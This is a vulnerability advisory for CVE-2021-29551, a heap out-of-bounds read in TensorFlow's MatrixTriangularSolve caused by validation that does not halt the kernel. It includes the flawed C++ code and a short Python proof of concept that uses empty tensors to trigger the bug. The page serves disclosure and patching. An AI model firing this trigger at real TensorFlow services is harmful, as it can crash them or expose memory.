CVE-2021-29551: OOB read in `MatrixTriangularSolve`
(updated )
The implementation of MatrixTriangularSolve
fails to terminate kernel execution if one validation condition fails:
void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0,
const Tensor& in1) override {
OP_REQUIRES(
ctx, in0.dims() >= 2,
errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims()));
OP_REQUIRES(
ctx, in1.dims() >= 2,
errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims()));
}
void Compute(OpKernelContext* ctx) override {
const Tensor& in0 = ctx->input(0);
const Tensor& in1 = ctx->input(1);
ValidateInputTensors(ctx, in0, in1);
MatMulBCast bcast(in0.shape().dim_sizes(), in1.shape().dim_sizes());
...
}
Since OP_REQUIRES
only sets ctx->status()
to a non-OK value and calls return
, this allows malicious attackers to trigger an out of bounds read:
import tensorflow as tf
import numpy as np
matrix_array = np.array([])
matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(1,0)),dtype=tf.float32)
rhs_array = np.array([])
rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(0,1)),dtype=tf.float32)
tf.raw_ops.MatrixTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor,lower=False,adjoint=False)
As the two input tensors are empty, the OP_REQUIRES
in ValidateInputTensors
should fire and interrupt execution. However, given the implementation of OP_REQUIRES
, after the in0.dims() >= 2
fails, execution moves to the initialization of the bcast
object. This initialization is done with invalid data and results in heap OOB read.
References
- github.com/advisories/GHSA-vqw6-72r7-fgw7
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-479.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-677.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-188.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/480641e3599775a8895254ffbc0fc45621334f68
- github.com/tensorflow/tensorflow/security/advisories/GHSA-vqw6-72r7-fgw7
- nvd.nist.gov/vuln/detail/CVE-2021-29551
Detect and mitigate CVE-2021-29551 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →